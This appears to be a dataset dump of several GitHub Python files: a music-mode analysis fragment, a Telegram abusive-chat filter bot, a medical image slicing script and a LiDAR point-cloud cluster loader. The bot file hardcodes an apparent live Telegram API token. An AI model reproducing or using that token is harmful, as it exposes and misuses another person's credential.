calcs_mode(s, alt, natural_scale, natural_mode, finalis, mode_basis=True)\n return calcs\n except:\n alternativa = f'Cierta escala sobre {finalis}'\n return alternativa\n else:\n try:\n ivls = intervals(alt, natural_scale, finalis)\n tr = modes[str(ivls[0])]\n alternativa = calcs_mode(s, alt, natural_scale, natural_mode, finalis, mode_basis=True, transposed=tr)\n return alternativa\n \n except:\n #the problem here is that sometimes an accidental is really only there to warn of musica ficta (semitonía),\n #but is not part of the mode. 
Count which version appears most often in the piece, and take that as the basis for the calculation.\n alternativa = f'Cierta escala sobre {finalis}'\n return alternativa\n\n\ndef mean_note(s, x):\n dct = {'superius': 0, 'altus': 1, 'tenor': 2, 'bassus': 3}\n part = s.parts[dct[x]]\n rs = statistics.median([p.ps for p in part.pitches])\n rs = pitch.Pitch(rs)\n return rs.nameWithOctave\n\n\ndef MT_relation(s, voice):\n rs_dct = dict()\n v = s.parts[voice]\n allText = text.assembleLyrics(v)\n ls = search.lyrics.LyricSearcher(v)\n lst = allText.split()\n lst = [i[:-1] if re.search(',', i) or re.search('\\\\.', i) else i for i in lst] # strip a trailing comma or period\n lst2 = set(lst)\n\n for i in lst2:\n sts_tmp = list()\n rs = ls.search(i)\n allRelevantNotes = None\n ########\n for x in range(0, len(rs)):\n firstNote = rs[x].els[0]\n lastNote = rs[x].els[-1]\n\n allRelevantNotes = [firstNote]\n currentNote = firstNote\n idd = lastNote.id\n ints = 0\n\n while currentNote is not None:\n currentNote = currentNote.next('Note')\n allRelevantNotes.append(currentNote)\n if currentNote is lastNote:\n break\n\n for n, z in enumerate(v.recurse()):\n if z.id == idd:\n try:\n if z.next('Note').lyric is None:\n z = z.next('Note')\n idd = z.id\n allRelevantNotes.append(z)\n else:\n break\n except:\n break\n \n for n, nt in enumerate(allRelevantNotes):\n if n == len(allRelevantNotes)-1:\n break\n int1 = interval.Interval(note.Note(nt.nameWithOctave), note.Note(allRelevantNotes[n + 1].nameWithOctave))\n sts = int1.semitones\n sts_tmp.append(sts)\n scaler = MinMaxScaler(feature_range=(-1, 1))\n scaled = scaler.fit_transform([[x] for x in sts_tmp])\n rs_dct.update({i: np.mean(scaled)})\n \n return rs_dct\n", "repo_name": "PabloLRmusic/Notebooks", "sub_path": "melodia_general.py", "file_name": "melodia_general.py", "file_ext": "py", "file_size_in_byte": 10881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collections.Counter", "line_number": 69, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 70, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 71, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 72, "usage_type": "call"}, {"api_name": "base.OrderedCounter", "line_number": 99, "usage_type": "call"}, {"api_name": "statistics.median", "line_number": 275, "usage_type": "call"}, {"api_name": "re.search", "line_number": 286, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 329, "usage_type": "call"}]} +{"seq_id": "36201769440", "text": "import Ngram\nimport database\nimport telebot\n\nfrom telebot import apihelper\nfrom os import path\nfrom time import sleep\n\nngram = Ngram.Ngram()\n\n###################### Set the Training Data ######################\n# Count Total Data Abusive & Slangword, then convert them to JSON\nif not path.exists('data json/total_data.json'):\n total_abusive = database.count_row(\"abusive\")\n total_slangword = database.count_row(\"slangword\")\n total_both = {'abusive': total_abusive, 'slangword': total_slangword}\n ngram.jsonConverter(\"data json/total_data.json\",\n total_both, \"convert\", None)\n\n# Get Data Abusive From Database & Convert them to JSON\nif not path.exists('data json/data_abusive.json'):\n abusive = database.get_all(\"abusive\")\n ngram.jsonConverter(\"data json/data_abusive.json\",\n abusive, \"convert\", None)\n\n# Get 
Data Slangword From Database & Convert them to JSON\nif not path.exists('data json/data_slangword.json'):\n slangword = database.get_all(\"slangword\")\n ngram.jsonConverter(\"data json/data_slangword.json\",\n slangword, \"convert\", None)\n\n# Train Model Ngram (Bi&Tri)\ndataset_limit = 1500\nif not path.exists('data json/trigram_train.json'):\n ngram.trainData(3, dataset_limit, \"data json/trigram_train.json\")\n\n###################### Set the Testing Data ######################\nstart_dataset = ngram.getRatioDataset(dataset_limit, 0.7)\noffset = ngram.getRatioDataset(dataset_limit, 0.3)\nt = 0.3\n\n# Get Data Abusive & Slangword from JSON\nget_abusive_from_json = ngram.jsonConverter(\n \"data json/data_abusive.json\", None, \"load\", None)\ndata_abusive = ngram.getAbusiveData(get_abusive_from_json)\ndata_slang = ngram.jsonConverter(\n \"data json/data_slangword.json\", None, \"load\", None)\n\nobj_dataset = ngram.getDataset(\n database.get_per_page(\"dataset\", start_dataset, offset))\nobj_re_dataset = ngram.checkEmoji(obj_dataset)\nobj_tokenize = ngram.tokenizing(obj_re_dataset)\nobj_replace = ngram.replacing(obj_tokenize, data_slang, data_abusive)\nobj_filter = ngram.filtering(obj_replace)\nobj_stem = ngram.stemming(obj_filter)\n\n\n# Telegram Bot\napi = '1604887518:AAEAagkqtki4thLoviQrfzjAS0bv8vC1m7Q'\nbot = telebot.TeleBot(api)\n\napihelper.SESSION_TIME_TO_LIVE = 5 * 60\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n bot.send_message(message.chat.id, \"\"\"\\\n Silakan kirim pesan ke saya. Saya akan coba olah pesan anda.\\\n \"\"\")\n\n\n@bot.message_handler(commands=['help'])\ndef send_help(message): # renamed from send_stop so the /stop handler below keeps a unique name\n bot.send_message(\n message.chat.id, \"\\\\- Bot ini merupakan bot filter chat yang mana bot ini akan mem\\\\-filter semua chat yang mengandung kata kasar\\\\. 
\\n\\n\\\\- Jika bot ini dimasukkan ke dalam grup, bot dapat menghapus chat yang mengandung kata kasar di dalam grup\\\\.\\n\\n*Note: Fitur hapus pesan hanya bekerja dalam grup chat dan posisi bot menjadi administrator\\\\!*\", parse_mode='MarkdownV2')\n\n\n@bot.message_handler(commands=['stop'])\ndef send_stop(message):\n bot.send_message(\n message.chat.id, \"Iri bilang bos, yahaayyyukk pal pale pale pal pale pale...\")\n\n\n@bot.message_handler(func=lambda m: True)\ndef re_msg(message):\n # Do Pre-processing Message\n def msg(): return ([message.text])\n ngram.botPreprocessing(msg, data_slang, data_abusive)\n obj_result = list(ngram.testData(\n 2, None, obj_stem, None, data_slang, \"bot\", t))\n # To Get Group Chat, set the privacy to DISABLED in BotFather\n print(\"message detail:\", message)\n\n combined_result = \"@%s said '%s'\" % (\n message.from_user.username, obj_result[0])\n\n print(combined_result)\n\n if message.chat.type == \"group\":\n if ngram.shouldWeDelete():\n database.add_message_bot(message.text, message.from_user.id)\n bot.send_message(message.chat.id, combined_result,\n parse_mode='MarkdownV2')\n bot.delete_message(message.chat.id, message.message_id)\n counter = database.count_penalty(message.from_user.id)\n if counter > 3:\n bot.kick_chat_member(message.chat.id, message.from_user.id)\n database.del_all_message(message.from_user.id)\n\n elif message.chat.type == \"private\":\n bot.send_message(message.chat.id, obj_result,\n parse_mode='MarkdownV2')\n\n\n# while True:\ntry:\n print(\"Bot is running\")\n bot.polling(none_stop=True)\nexcept [ConnectionError, ConnectionResetError]:\n sleep(300)\n", "repo_name": "wayhdyh98/TelebotMind", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 4491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "Ngram.Ngram", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "name"}, {"api_name": "database.count_row", "line_number": 14, "usage_type": "call"}, {"api_name": "database.count_row", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "database.get_all", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "name"}, {"api_name": "database.get_all", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "name"}, {"api_name": "database.get_per_page", "line_number": 50, "usage_type": "call"}, {"api_name": "telebot.TeleBot", "line_number": 60, "usage_type": "call"}, {"api_name": "telebot.apihelper.SESSION_TIME_TO_LIVE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "telebot.apihelper", "line_number": 62, "usage_type": "name"}, {"api_name": "database.add_message_bot", "line_number": 101, "usage_type": "call"}, {"api_name": "database.count_penalty", "line_number": 105, "usage_type": "call"}, {"api_name": "database.del_all_message", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "16058156360", "text": "#!/usr/bin/env python\n\n''' \nThis script 
extracts 2D image slices from a 3D image volume. \n'''\nimport argparse\nimport sys\nimport os\nimport logging\n\nfrom manage import get_logger_name, init_logging, get_log_file_name\nimport numpy as np\nfrom parameters import Parameters\nfrom image import Image\nfrom graphics import Graphics\nfrom model import Model \nfrom path import Path \n\nlogger = logging.getLogger(get_logger_name())\n\nclass Args(object):\n ''' This class defines the command line arguments to the extract-2d-images script.\n '''\n PREFIX = \"--\"\n ENABLE_GRAPHICS = \"enable_graphics\"\n EXTRACT_SLICES = \"extract_slices\"\n IMAGE_FILE = \"image_file_name\"\n MODEL_FILE = \"model_file_name\"\n PATH_FILE = \"path_file_name\"\n PATH_SAMPLE_METHOD = \"path_sample_method\"\n RESULTS_DIRECTORY = \"results_directory\"\n SLICE_INCREMENT = \"slice_increment\"\n SLICE_WIDTH = \"slice_width\"\n\ndef cmd(name):\n ''' Create an argparse command argument.\n '''\n return Args.PREFIX + name.replace(\"_\", \"-\")\n\ndef parse_args():\n ''' Parse command-line arguments.'''\n parser = argparse.ArgumentParser()\n\n parser.add_argument(cmd(Args.ENABLE_GRAPHICS), help=\"Enable graphics to show geometry in a graphics window.\")\n parser.add_argument(cmd(Args.EXTRACT_SLICES), help=\"Automatically extract slices using the slice increment.\")\n parser.add_argument(cmd(Args.IMAGE_FILE), help=\"The image (.vti) file.\")\n parser.add_argument(cmd(Args.MODEL_FILE), help=\"The model (.vtp) file.\")\n parser.add_argument(cmd(Args.PATH_FILE), help=\"The path (.pth) file.\")\n parser.add_argument(cmd(Args.PATH_SAMPLE_METHOD), help=\"The method used to sample path points: number, distance\")\n parser.add_argument(cmd(Args.RESULTS_DIRECTORY), help=\"The directory to write image slice and model slice files.\")\n parser.add_argument(cmd(Args.SLICE_INCREMENT), help=\"The slice increment along a path.\")\n parser.add_argument(cmd(Args.SLICE_WIDTH), help=\"The width of a slice plane.\")\n\n return parser.parse_args(), parser.print_help\n\ndef set_parameters(**kwargs):\n ''' Set the values of parameters input from the command line.\n '''\n print(kwargs)\n logger.info(\"Parse arguments ...\")\n\n ## Create a Parameters object to store parameters.\n params = Parameters()\n\n ## Process arguments.\n #\n if kwargs.get(Args.ENABLE_GRAPHICS):\n params.enable_graphics = kwargs.get(Args.ENABLE_GRAPHICS) in ['true', 'True']\n\n if kwargs.get(Args.EXTRACT_SLICES):\n params.extract_slices = kwargs.get(Args.EXTRACT_SLICES) in ['true', 'True']\n\n if kwargs.get(Args.IMAGE_FILE):\n params.image_file_name = kwargs.get(Args.IMAGE_FILE)\n logger.info(\"Image file: %s\" % params.image_file_name)\n if not os.path.exists(params.image_file_name):\n logger.error(\"The image file '%s' was not found.\" % params.image_file_name)\n return None\n\n if kwargs.get(Args.MODEL_FILE):\n params.model_file_name = kwargs.get(Args.MODEL_FILE)\n logger.info(\"Model file: %s\" % params.model_file_name)\n if not os.path.exists(params.model_file_name):\n logger.error(\"The model file '%s' was not found.\" % params.model_file_name)\n return None\n\n if kwargs.get(Args.PATH_FILE):\n params.path_file_name = kwargs.get(Args.PATH_FILE)\n logger.info(\"Path file: %s\" % params.path_file_name)\n if not os.path.exists(params.path_file_name):\n logger.error(\"The path file '%s' was not found.\" % params.path_file_name)\n return None\n\n if kwargs.get(Args.PATH_SAMPLE_METHOD):\n params.path_sample_method = kwargs.get(Args.PATH_SAMPLE_METHOD)\n\n if kwargs.get(Args.RESULTS_DIRECTORY):\n
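# store the output directory where the extracted image and model slice files are written\n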
params.results_directory = kwargs.get(Args.RESULTS_DIRECTORY)\n\n if kwargs.get(Args.SLICE_INCREMENT):\n params.slice_increment = int(kwargs.get(Args.SLICE_INCREMENT))\n logger.info(\"Slice increment: %d\" % params.slice_increment)\n\n if kwargs.get(Args.SLICE_WIDTH):\n params.slice_width= float(kwargs.get(Args.SLICE_WIDTH))\n logger.info(\"Slice width: %g\" % params.slice_width)\n\n return params\n\nif __name__ == '__main__':\n init_logging()\n args, print_help = parse_args()\n params = set_parameters(**vars(args))\n if not params:\n logger.error(\"Error in parameters.\")\n sys.exit(1)\n\n ## Create graphics interface. \n graphics = Graphics(params, params.enable_graphics)\n\n ## Read in the volume image.\n image = Image(params)\n image.graphics = graphics\n image.read_volume()\n image.display_edges()\n graphics.image = image\n\n ## Show some slices in ijk.\n #image.display_axis_slice('i', 255)\n #image.display_axis_slice('j', 30)\n #image.display_axis_slice('k', 255)\n\n ## Read in and display paths.\n paths = Path.read_path_file(params, graphics)\n graphics.paths = paths \n for path in paths:\n path.create_path_geometry()\n\n ## Read in and display model.\n model = Model(params, graphics)\n model.read_model_file()\n model.create_model_geometry()\n graphics.model = model\n\n if params.extract_slices:\n graphics.auto_slice()\n\n ## Show image, paths and model. \n graphics.show()\n\n", "repo_name": "ktbolt/cardiovascular", "sub_path": "extract-2d-images/python/extact-2d-images.py", "file_name": "extact-2d-images.py", "file_ext": "py", "file_size_in_byte": 5207, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "manage.get_logger_name", "line_number": 19, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 42, "usage_type": "call"}, {"api_name": "parameters.Parameters", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "manage.init_logging", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 116, "usage_type": "call"}, {"api_name": "graphics.Graphics", "line_number": 119, "usage_type": "call"}, {"api_name": "image.Image", "line_number": 122, "usage_type": "call"}, {"api_name": "image.graphics", "line_number": 123, "usage_type": "attribute"}, {"api_name": "image.read_volume", "line_number": 124, "usage_type": "call"}, {"api_name": "image.display_edges", "line_number": 125, "usage_type": "call"}, {"api_name": "graphics.image", "line_number": 126, "usage_type": "attribute"}, {"api_name": "path.Path.read_path_file", "line_number": 134, "usage_type": "call"}, {"api_name": "path.Path", "line_number": 134, "usage_type": "name"}, {"api_name": "graphics.paths", "line_number": 135, "usage_type": "attribute"}, {"api_name": "path.create_path_geometry", "line_number": 137, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 140, "usage_type": "call"}, {"api_name": "model.read_model_file", "line_number": 141, "usage_type": "call"}, {"api_name": 
"model.create_model_geometry", "line_number": 142, "usage_type": "call"}, {"api_name": "graphics.model", "line_number": 143, "usage_type": "attribute"}, {"api_name": "graphics.auto_slice", "line_number": 146, "usage_type": "call"}, {"api_name": "graphics.show", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "71189582046", "text": "import numpy as np \nimport torch \nimport os \nimport os.path as osp \nfrom utils.slam import *\ntry:\n from torchsparse.utils.quantize import sparse_quantize\n def grid_subsample(accumulated_pointcloud,accumulated_confidence,vox_size):\n _, indices = sparse_quantize(accumulated_pointcloud[:,:3], vox_size,return_index=True)\n accumulated_pointcloud = accumulated_pointcloud[indices]\n accumulated_confidence = accumulated_confidence[indices]\n return accumulated_pointcloud,accumulated_confidence\nexcept:\n import cpp_wrappers.cpp_subsampling.grid_subsampling as cpp_subsampling\n def grid_subsample(accumulated_pointcloud, accumulated_confidence, vox_size):\n _, fts, lbls = cpp_subsampling.subsample(accumulated_pointcloud[:,:3].astype(np.float32),\n features=np.hstack((accumulated_pointcloud,accumulated_confidence)).astype(np.float32),\n classes = accumulated_pointcloud[:,4].astype(np.int32).reshape(-1,1),\n sampleDl=vox_size,\n verbose=False)\n accumulated_pointcloud = fts[:,:-1]\n accumulated_pointcloud[:,4] = lbls.reshape(-1)\n accumulated_confidence = fts[:,-1].reshape(-1,1)\n return accumulated_pointcloud.astype(np.float64), accumulated_confidence.astype(np.float64)\nfrom cpp_wrappers.cpp_preprocess.propagation import compute_labels, cluster\nimport random\nfrom tqdm import tqdm\n\nclass InfiniteDataLoader(torch.utils.data.DataLoader):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # Initialize an iterator over the dataset.\n self.dataset_iterator = super().__iter__()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n try:\n batch = next(self.dataset_iterator)\n except StopIteration:\n # Dataset exhausted, use a new fresh iterator.\n self.dataset_iterator = super().__iter__()\n batch = next(self.dataset_iterator)\n return batch\n\nclass BalancedSampler(object):\n r\"\"\"Base class for all Samplers.\n\n Every Sampler subclass has to provide an __iter__ method, providing a way\n to iterate over indices of dataset elements, and a __len__ method that\n returns the length of the returned iterators.\n \"\"\"\n\n def __init__(self, data_source,n_label,shuffle=50000,batch_size=1):\n self.data_source = data_source #list of lists\n self.n_label = n_label\n self.reshuffle = shuffle\n self.batch_size=batch_size\n try:\n self.data_source = [ds.tolist() for ds in data_source]\n except:\n self.data_source = data_source\n\n def __iter__(self):\n lbl_curr = 0\n counter = [0 for _ in range(self.n_label)]\n c = 0\n self.data_source = [random.sample(ds,len(ds)) for ds in self.data_source]\n batch = []\n for _ in range(sum([len(ds) for ds in self.data_source])):\n if len(batch) == self.batch_size:\n yield batch\n batch = []\n batch.append(int(self.data_source[lbl_curr][counter[lbl_curr]]))\n counter[lbl_curr] = (counter[lbl_curr] + 1) % len(self.data_source[lbl_curr])\n if counter[lbl_curr] == 0:\n self.data_source[lbl_curr] = random.sample(self.data_source[lbl_curr],len(self.data_source[lbl_curr]))\n lbl_curr = (lbl_curr + 1) % self.n_label\n c += 1\n if c == self.reshuffle:\n self.data_source = [random.sample(ds,len(ds)) for ds in self.data_source]\n counter = [0 for _ in range(self.n_label)]\n c = 0\n\n def __len__(self):\n 
raise NotImplementedError\n\nclass ClusterDataset(torch.utils.data.Dataset):\n\n def __init__(self, config, dataset):\n self.config = config \n self.dataset = dataset \n self.cluster_path = osp.join(self.config.cluster.path,self.config.source,self.config.cluster.name)\n self.n_label = self.dataset.get_n_label()\n self.generate_dataset()\n print(\"Cluster dataset \"+self.dataset.split+\" created.\")\n self.get_weight()\n print(\"Data information for \"+self.dataset.split+\" created. Loader ready.\")\n\n def __len__(self):\n return len(self.datalist) \n\n def get_class_names(self):\n return self.dataset.label_names\n\n def __getitem__(self, index):\n index = int(self.datalist[index,-1])\n seq = index//(self.n_clust_max*self.size_seq_max)\n scan = (index-seq*self.n_clust_max*self.size_seq_max)//self.n_clust_max\n cluster_number = index%self.n_clust_max\n return self.get_cluster(seq,scan,cluster_number)\n\n def get_cluster(self,seq_number,frame_number,cluster_number):\n try:\n return np.fromfile(osp.join(self.cluster_path,self.dataset.sequence[seq_number],str(frame_number)+'_'+str(cluster_number)+'.bin'),dtype=np.float32).reshape(-1,6)\n except:\n #return None\n raise NameError(\"Cluster : \" + str(self.dataset.sequence[seq_number]) + \"_\" + str(frame_number)+ \"_\" + str(cluster_number) + \" not found\")\n\n def get_dataset(self):\n self.size_seq_max = max([self.dataset.get_size_seq(s) for s in range(len(self.dataset.sequence))])\n self.n_clust_max = self.config.cluster.n_centroids\n self.total = 0\n for seq in self.dataset.sequence:\n seq_path = osp.join(self.cluster_path, seq) \n self.total += len(list(os.listdir(seq_path)))\n\n\n def get_weight(self):\n self.init_weight()\n self.class_frames = []\n self.datalist = self.datalist[np.logical_and(np.sum(self.datalist[:,:-1],axis=1)<20000,np.sum(self.datalist[:,:-1],axis=1)>100)]\n for i in range(self.n_label):\n integer_inds = np.where(self.datalist[:, i]>10)[0]\n self.class_frames.append(integer_inds.astype(np.int64))\n self.class_frames[i] = np.random.permutation(self.class_frames[i])\n\n class_proportions = np.sum(self.datalist[:,:-1],axis=0)\n self.w = 1/(100*class_proportions/np.sum(class_proportions))\n self.w[self.w<0.05] = 0.05\n self.w[self.w>50] = 50\n\n\n def init_weight(self):\n seq_stat_file = osp.join(self.cluster_path, self.dataset.split,'weight_stats_cluster.npy')\n if osp.exists(seq_stat_file):\n with open(seq_stat_file, 'rb') as f:\n self.datalist = np.load(f)\n self.total = len(self.datalist)\n self.n_clust_max = self.config.cluster.n_centroids\n self.size_seq_max = max([self.dataset.get_size_seq(s) for s in range(len(self.dataset.sequence))]) \n else:\n self.get_dataset()\n self.datalist = np.zeros((self.total, self.n_label+1))\n os.makedirs(osp.join(self.cluster_path, self.dataset.split),exist_ok=True)\n i = 0\n for s in range(len(self.dataset.sequence)):\n for k in range(self.dataset.get_size_seq(s)):\n for l in range(self.config.cluster.n_centroids):\n clust = self.get_cluster(s,k,l)\n if clust is None:\n continue\n unique, counts = np.unique(clust[clust[:,4] != -1,4], return_counts=True)\n idx = self.n_clust_max*self.size_seq_max*s + self.n_clust_max*k + l\n self.datalist[i,unique.astype(np.int32)] = counts\n self.datalist[i,-1] = idx\n i+=1\n np.save(seq_stat_file, self.datalist)\n\n def generate_dataset(self):\n for i in tqdm(range(len(self.dataset.sequence)),desc=\"Processing dataset \"+str(self.config.source)):\n self.generate_sequence(i)\n\n def generate_sequence(self,seq_number):\n if 
osp.exists(osp.join(self.cluster_path,self.dataset.sequence[seq_number])):\n return True \n os.makedirs(osp.join(self.cluster_path,self.dataset.sequence[seq_number]),exist_ok=True)\n\n #init accumulated arrays\n accumulated_pointcloud = np.empty((0,6)).astype(np.float64)\n accumulated_confidence = np.empty(0, dtype=np.float64)\n\n #get slam poses\n rot, trans = self.dataset.get_poses_seq(seq_number)\n\n #get sequence information\n len_seq = self.dataset.get_size_seq(seq_number)\n seq = self.dataset.sequence[seq_number]\n \n #accumulate\n lastIndex = 1\n local_limit = self.config.sequence.limit_GT_time\n start = [i for i in range(self.config.subsample)]\n for st in start:\n for frame in tqdm(range(st,len_seq,len(start)),leave=False,desc=\"Sequence: \" + str(self.dataset.sequence[seq_number]) + \", subsample number \" +str(st+1)+\"/\"+str(len(start))):\n if frame>st:\n #Check if the sensor moved more than min_dist_mvt\n if np.linalg.norm(local_trans - trans[frame-lastIndex]) < self.config.sequence.min_dist_mvt:\n accumulated_pointcloud = accumulated_pointcloud[:-len(pointcloud)]\n accumulated_confidence = accumulated_confidence[:-len(pointcloud)]\n local_limit += 1\n lastIndex += 1\n else:\n lastIndex =1\n\n #voxelize the past sequence and remove old points\n if len(accumulated_pointcloud) > 0:\n accumulated_pointcloud, accumulated_confidence = grid_subsample(accumulated_pointcloud, accumulated_confidence, self.config.sequence.subsample)\n accumulated_confidence = accumulated_confidence[accumulated_pointcloud[:,-1] > frame - local_limit]\n accumulated_pointcloud = accumulated_pointcloud[accumulated_pointcloud[:,-1] > frame - local_limit]\n\n pointcloud, label = self.dataset.loader(seq,frame)\n\n #discard information beyond a certain distance\n if self.config.sequence.out_lim>0:\n norm_curr = np.linalg.norm(pointcloud[:,:3],axis=1)\n pointcloud = pointcloud[norm_curr<self.config.sequence.out_lim]\n label = label[norm_curr<self.config.sequence.out_lim]\n\n #extend the frame with a label column and a frame-index column\n pointcloud = np.hstack((pointcloud,np.zeros((len(pointcloud),2))))\n pointcloud[:,-1] = frame\n\n #keep only accumulated points near the current frame's center\n if len(accumulated_pointcloud)>0:\n center_current = np.mean(pointcloud[:,:2],axis=0)\n norm_acc = np.linalg.norm(accumulated_pointcloud[:,:2]-center_current,axis=1)\n accumulated_pointcloud = accumulated_pointcloud[norm_acc<self.config.sequence.out_lim]\n accumulated_confidence = accumulated_confidence[norm_acc<self.config.sequence.out_lim]\n\n #register the frame with its slam pose and append it to the accumulated cloud\n local_trans = trans[frame]\n pointcloud[:,:3] = pointcloud[:,:3] @ rot[frame].T + local_trans\n accumulated_pointcloud = np.vstack((accumulated_pointcloud,pointcloud))\n accumulated_confidence = np.concatenate((accumulated_confidence,np.zeros(len(pointcloud))))\n\n #propagate labels onto the new frame and mask its dynamic points\n #(the compute_labels arguments and the dynamic-class test are assumptions)\n acc_label = np.copy(accumulated_pointcloud[:,4]).astype(np.int32)\n acc_label = compute_labels(accumulated_pointcloud, accumulated_confidence, acc_label, len(pointcloud))\n dynamic_current = np.where(acc_label>250)[0]\n dynamic_current = dynamic_current[dynamic_current > (len(acc_label) - len(label))]\n acc_label[dynamic_current] = -1\n\n clusters = cluster(accumulated_pointcloud, acc_label, len(pointcloud), self.config.cluster.voxel_size, self.config.cluster.n_centroids, 'Kmeans')\n\n clusters = list(filter(lambda e: len(e)>1,clusters))\n clusters = [np.array(c) for c in clusters]\n accumulated_pointcloud[:,4] = acc_label\n pointcloud[:,4] = accumulated_pointcloud[-len(pointcloud):,4]\n\n accumulated_pointcloud[-len(pointcloud):,4] = label\n accumulated_confidence[-len(pointcloud):] = 1\n #save\n for c in range(len(clusters)):\n accumulated_pointcloud[clusters[c]].astype(np.float32).tofile(osp.join(self.cluster_path,seq,str(frame)+'_'+str(c)+'.bin'),format='float32')\n\n", "repo_name": "JulesSanchez/3DLabelProp", "sub_path": "datasets/cluster_dataset.py", "file_name": "cluster_dataset.py", "file_ext": "py", "file_size_in_byte": 12796, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torchsparse.utils.quantize.sparse_quantize", "line_number": 9, "usage_type": "call"}, {"api_name": "cpp_wrappers.cpp_subsampling.grid_subsampling.subsample", "line_number": 16, "usage_type": "call"}, {"api_name": "cpp_wrappers.cpp_subsampling.grid_subsampling", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 17, "usage_type": 
"call"}, {"api_name": "numpy.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 29, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 69, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 78, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.fromfile", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 169, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 176, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 181, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 182, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 196, "usage_type": "call"}, {"api_name": 
